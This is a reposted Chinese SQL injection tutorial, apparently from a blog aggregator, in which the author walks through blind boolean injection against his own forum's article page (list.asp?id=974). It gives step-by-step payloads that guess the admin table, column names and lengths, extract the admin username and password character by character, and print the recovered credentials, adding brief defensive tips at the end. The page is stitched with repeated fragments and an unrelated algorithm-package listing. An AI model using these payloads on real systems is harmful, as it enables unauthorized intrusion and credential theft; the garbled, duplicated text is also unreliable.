給大家發乙個SQL注入實戰教程吧

2021-03-31 08:56:59 字數 3524 閱讀 2418

(大家可以用google搜尋,.jinshouzhi.

有得下)

這篇文章是去年10月份發的,我今年3月份才發現,這麼長時間以來我的**.shbbs.***

一直被當作教程攻

擊,呵呵,暈死。直到有乙個好心網友提醒我我才做了一些處理。

大家不要再按教程上直接使用攻擊我的**.shbbs.***

了,呵呵我已經打了預防針了:)找別人的去演習吧

實戰 sql injection

目標:.shbbs.***

的文章發布系統~~

開啟 http://.shbbs.***/article/list.asp?id=974

在 http://.shbbs.***/article/list.asp?id=974

後加個 '

出錯!id沒有過濾.

好。現在步驟就是

1、猜管理員賬號的表

2、猜相應表中的使用者的欄位名以及密碼的欄位名.

3、猜出使用者名稱的長度和密碼的長度.

3、猜出使用者名稱和密碼

4、找到管理介面進去登陸管理.

猜管理員表:

and 1=(select min(id) from admin) '//min(id) 返回表

中id最小的值.

返回文章,證明有乙個admin的表.如果沒有返回文章,證明出錯!不存在admin這個表.

猜使用者的欄位名

and 1=(select min(id) from admin where user='**q')

返回錯誤資訊,表示沒有user這個使用者欄位名

再來~~

and 1=(select min(id) from admin where

username='**q')

沒有返回錯誤資訊.又也沒有返回文章,提示找不到相應文章

證明:在admin中存在username這個欄位.

只是使用者名稱不是**q

猜密碼的欄位名

and 1=(select min(id) from admin where passwd='**q')

返回錯誤資訊,表示沒有passwd這個密碼欄位名

再來~~

and 1=(select min(id) from admin where

password='**q')

沒有返回錯誤資訊.也沒有返回文章.提示找不到相應文章.

證明:在admin中存在password這個欄位.

只是密碼不是**q

現在就來猜使用者欄位名長度

and 1=(select min(id) from admin where

len(username)>8)

正確~~

正確~~

使用者名稱長度 大於8 小於15

and 1=(select min(id) from admin where

len(username)=10)

呵呵~~使用者名稱長度為10位``~~

猜密碼長度

and 1=(select min(id) from admin where

len(password)>8)

正確~~

and 1=(select min(id) from admin where

len(password)<15)

正確~~~

密碼長度也是  大於8 小於15

and 1=(select min(id) from admin where

len(password)=10)

呵呵~~密碼長度為10.

使用者名稱長度為:10 密碼長度為:10

現在來猜使用者名稱.

and 1=(select min(id) from admin where

mid(username,1,1)='a')

錯了~~

我再猜~~

and 1=(select min(id) from admin where

mid(username,1,1)='s')

呵呵~~正確~~

使用者名稱第一位是 s

猜使用者名稱的第二位~~

and 1=(select min(id) from admin where

mid(username,2,1)='h')

使用者名稱第二位是 h

由於時間關係,我早就猜好了,使用者名稱:shbbsadmin

我們現在來猜密碼~~ 猜密碼跟猜使用者名稱一樣~~

and 1=(select min(id) from admin where

mid(password,1,1)='s')

猜啊猜~

由於時間關係,密碼我都猜好了,呵呵~~密碼:shbbsadmin 哈哈~~跟使用者名稱一樣~~~~

使用者:shbbsadmin

密碼:shbbsadmin              

有些sb就拿我開刀,所幸我的論壇和文章發布系統使用者名稱密碼各不相同,否則損失可慘了

於是培養了稍於注意安全的寫**習慣。

如id等數值型引數都是加cint()進行型別轉換的,注入絕對是不成功的,如果是字元型引數都不用害怕',會當

做乙個字元部分,毫無作用。

另外就是對傳入引數做長度限定,比如

if len(request("id"))>5 then response.end

簡單的一句話讓注入攻擊者一籌莫展。

給大家發乙個SQL注入實戰教程吧

這篇文章是去年10月份發的,我今年3月份才發現,這麼長時間以來我的 www.shbbs.net 一直被當作教程攻 擊,呵呵,暈死。直到有乙個好心提醒我我才做了一些處理。大家不要再按教程上直接使用攻擊我的 www.shbbs.net 了,呵呵我已經打了預防針了 找別人的去演習吧 實戰 sql inje...

給大家發乙個SQL注入實戰教程吧

大家可以用google搜尋,www.jinshouzhi.org 有得下 這篇文章是去年10月份發的,我今年3月份才發現,這麼長時間以來我的 www.shbbs.net 一直被當作教程攻 擊,呵呵,暈死。直到有乙個好心提醒我我才做了一些處理。大家不要再按教程上直接使用攻擊我的 www.shbbs.n...

給大家共享乙個基本演算法包

包含內容 下面是文件包含的內容 二分查詢1.c 二分查詢2.c 二叉樹.c 其它單元加 單迴圈鍊錶.c 單鏈表.c 圖.c字元 定長串.c 小寫數字轉為大寫數字 帶頭結點雙鏈迴圈線性表.c 底層程式設計 效驗演算法 數學問題 資料結構 陣列檔案程式 求進製漢諾塔 硬幣情況 逆陣鏈串.c 鏈棧.c 鏈...